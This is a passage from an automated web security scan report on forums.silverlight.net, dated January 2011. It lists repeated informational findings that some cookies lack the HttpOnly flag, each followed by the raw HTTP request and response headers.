X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Elemen
...[SNIP]...

17.190. http://forums.silverlight.net/forums/p/217498/518305.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217498/518305.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217498/518305.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 58467
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:55 GMT; expires=Sun, 29-Jan-2012 23:19:55 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   MVVM a
...[SNIP]...

17.191. http://forums.silverlight.net/forums/p/217562/518302.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217562/518302.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217562/518302.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31591
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:16 GMT; expires=Sun, 29-Jan-2012 23:20:16 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:16 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Self-R
...[SNIP]...

17.192. http://forums.silverlight.net/forums/p/217667/518301.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217667/518301.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217667/518301.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31838
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:17 GMT; expires=Sun, 29-Jan-2012 23:20:17 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Datagr
...[SNIP]...

17.193. http://forums.silverlight.net/forums/p/217709/518306.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217709/518306.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217709/518306.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 27094
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:33 GMT; expires=Sun, 29-Jan-2012 23:19:33 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   XAML,
...[SNIP]...

17.194. http://forums.silverlight.net/forums/p/217710/518307.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217710/518307.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217710/518307.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25483
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Questi
...[SNIP]...

17.195. http://forums.silverlight.net/forums/p/217719/518310.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217719/518310.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217719/518310.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 29785
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:10 GMT; expires=Sun, 29-Jan-2012 23:19:10 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:10 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Do I r
...[SNIP]...

17.196. http://forums.silverlight.net/forums/p/217724/518300.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217724/518300.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217724/518300.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25057
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:24 GMT; expires=Sun, 29-Jan-2012 23:20:24 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:24 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WP7 -
...[SNIP]...

17.197. http://forums.silverlight.net/forums/p/217726/518308.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217726/518308.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217726/518308.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23439
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Callin
...[SNIP]...

17.198. http://forums.silverlight.net/forums/p/217727/518309.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217727/518309.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217727/518309.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23148
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:17 GMT; expires=Sun, 29-Jan-2012 23:19:17 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Astero
...[SNIP]...

17.199. http://forums.silverlight.net/forums/t/217026.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217026.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217026.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 107388
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:06 GMT; expires=Sun, 29-Jan-2012 23:19:06 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Elemen
...[SNIP]...

17.200. http://forums.silverlight.net/forums/t/217498.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217498.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217498.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 58442
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:53 GMT; expires=Sun, 29-Jan-2012 23:18:53 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:53 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   MVVM a
...[SNIP]...

17.201. http://forums.silverlight.net/forums/t/217562.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217562.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217562.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31566
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:54 GMT; expires=Sun, 29-Jan-2012 23:18:54 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:56 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Self-R
...[SNIP]...

17.202. http://forums.silverlight.net/forums/t/217667.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217667.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217667.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31813
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Datagr
...[SNIP]...

17.203. http://forums.silverlight.net/forums/t/217709.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217709.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217709.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 27069
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close


